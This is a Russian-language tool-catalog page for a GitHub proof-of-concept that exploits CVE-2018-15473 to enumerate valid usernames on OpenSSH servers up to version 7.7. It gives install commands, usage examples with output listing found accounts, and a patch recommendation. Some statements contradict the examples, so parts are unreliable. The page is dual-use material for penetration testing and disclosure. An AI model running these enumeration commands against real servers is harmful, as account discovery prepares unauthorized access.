Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-15473 — Инструмент для перебора имен пользователей SSH, использующий уязвимость CVE-2018-15473 для определения действительных пользователей на серверах OpenSSH с помощью обхода аутентификации на основе временных задержек. | Kitploit
Инструменты/GitHubGitHub/1stpeak/cve-2018-15473
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииСетевая безопасностьТестирование на Проникновение
GitHub1stpeak/cve-2018-15473

CVE-2018-15473

Инструмент для перебора имен пользователей SSH, использующий уязвимость CVE-2018-15473 для определения действительных пользователей на серверах OpenSSH с помощью обхода аутентификации на основе временных задержек.

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-15473

Причина

Сервер OpenSSH не задерживает обработку пользователя с недействительной аутентификацией до полного разбора пакета, содержащего запрос. Эта уязвимость связана с файлами auth2-gss.c, auth2-hostbased.c, auth2-pubkey.c.

Использование

Хотя эту уязвимость нельзя использовать для создания списка действительных имен пользователей, её всё же можно применять для перебора и угадывания имен пользователей.

Затронутые версии

OpenSSH <= 7.7

Незатронутые версии

openssh-7.8p1-1.fc28 openssh-7.6p1-6.fc27

Установка PoC

Возможно, вам потребуется установить эквивалентный пакет openssl-dev для вашего дистрибутива.

root@kitploit:~
# 注意:如果您在kali上安装,则可以跳过pip安装,只需执行下面第一二三行的步骤,因为paramiko已经存在。 
git clone https://github.com/1stPeak/CVE-2018-15473.git
cd CVE-2018-15473
chmod u+x ssh-username-enum.py
pip install -r requirements.txt 
# 或者使用以下命令下载安装 
pipenv install -r requirements.txt  # if you're cool like that   
chmod u+x ssh-username-enum.py

Примеры использования

Пример 1: Перебор одного пользователя

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -u root 192.168.1.2
[+] root found!

Пример 2: Перебор нескольких пользователей с использованием 10 потоков (по умолчанию 4)

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2
[+] man found!
[+] guest found!
[+] nobody found!
[!] SSH negotiation failed for user nobody4.
[+] lpadmin found!
и т.д.

Пример 3: IPv6-адрес с указанием порта SSH

root@kitploit:~
peak@kali:~/CVE-2018-15473$ ./ssh-username-enum.py -t 10 -w /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.2 '::1'
[+] ROOT found!
[+] syslog found!
[+] sslh found!
[!] SSH negotiation failed for user sssd.
[+] rfindd found!
[+] ultra found!
и т.д.

Решение

Рекомендуется обновиться до незатронутой версии. Проект OpenBSD опубликовал исправление исходного кода по следующей ссылке: https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0

Ссылки

https://github.com/epi052/cve-2018-15473
http://blog.nsfocus.net/openssh-cve-2018-15919/

Скачать инструмент